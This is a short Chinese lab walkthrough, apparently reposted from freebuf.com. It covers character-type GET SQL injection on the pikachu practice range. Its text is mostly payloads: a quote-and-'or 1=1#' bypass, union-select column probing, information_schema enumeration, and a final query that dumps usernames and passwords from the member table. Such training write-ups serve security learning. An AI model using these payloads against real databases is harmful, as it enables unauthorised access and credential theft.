pikachu靶场-Sql Inject(SQL注入)-字符型注入(GET) – 作者:知非知非知非

1626740600_60f61778a746515b4fca0.png!small

1626740613_60f61785128968414f526.png!small

1626740619_60f6178bc186102d1ed71.png!small

可以上图输出可预计代码逻辑为:

select uid,email where username = ‘kobe’;

或者

select uid,email where username =“kobe”;

才是我们来构造数据!!!!

kobe‘ or 1=1#   //注意#号后边有一个空格,成功

或者

kobe” or 1=1#

1626740630_60f61796414d8ff42a03c.png!small

后边的步骤老样子,就直接截图了!!!!

1626740637_60f6179d5d428c23709b9.png!small

1626740642_60f617a256ece10934e07.png!small

两列:

-1′ union select 1,2#’

1626740648_60f617a8d1b36806d7e20.png!small

-1′ union select database(),version()#’

1626740655_60f617af5e61f053cd019.png!small

-1′ union select 1,group_concat(table_name) from information_schema.tables where table_schema=’pikachu’#’

1626740661_60f617b54a69e44c5388f.png!small

-1′ union select 1,group_concat(column_name) from information_schema.columns where table_name=’member’#’

1626740666_60f617ba26e4c5bb9c934.png!small

-1′ union select username,pw from member#’

1626740673_60f617c1a47acc1917599.png!small

所有的用户名和密码对已经获得,结束!!!

来源:freebuf.com 2021-07-20 08:25:25 by: 知非知非知非

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论